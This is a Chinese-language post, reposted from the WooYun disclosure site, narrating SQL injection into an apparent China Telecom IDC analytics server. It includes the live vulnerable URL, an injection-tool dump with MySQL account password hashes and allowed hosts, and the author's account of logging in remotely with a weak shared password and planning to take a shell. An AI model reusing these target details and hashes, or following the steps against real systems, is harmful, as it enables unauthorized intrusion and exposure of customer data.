转的wooyun

发现的比较的偶然~入侵的比较愕然~

1.偶然间发现的电信的比较奇葩SQL注入漏洞（貌似是为监控客户网站的访问情况），该情况可能在电信IDC具有通用性，测试地址http://118.123.206.9/preuid.php?uid=2610023800

Web Server: Apache/2.2.23 (Unix) PHP/5.4.7

Powered-by: PHP/5.4.7

DB Server: MySQL >=5

Current User: root@localhost

Sql Version: 5.5.28-log

Current DB: analytics

System User: root@localhost

Host Name: localhost.localdomain

Installation dir: /usr

DB User & Pass: root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:localhost

root::localhost.localdomain

root::127.0.0.1

::localhost

::localhost.localdomain

remote:*A4B6157319038724E3560894F7F932C8886EBFCF:%

root:*70A3DDDA7052B54160CE5B0BF385872C8E470224:%

hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.9

web:*A4B6157319038724E3560894F7F932C8886EBFCF:%

hpflow:*70A3DDDA7052B54160CE5B0BF385872C8E470224:118.123.206.7

Data Bases: information_schema

IDC

analytics

mysql

netflow

performance_schema

rec_web

report

report1

test

web

web_test

zj

前台没啥看的~

2.数据库权限还是root，好吧看来数据库允许web，remote用户外连，而且都是相同的弱口令，ok~那就来telnet下看是否默认端口吧~~~
bingo~还是root权限~

3.看看有啥好东西没~貌似监控了不少网站~

4.好吧~既然这样了，不拿shell都对不起自己了~(提权已经没啥意义了)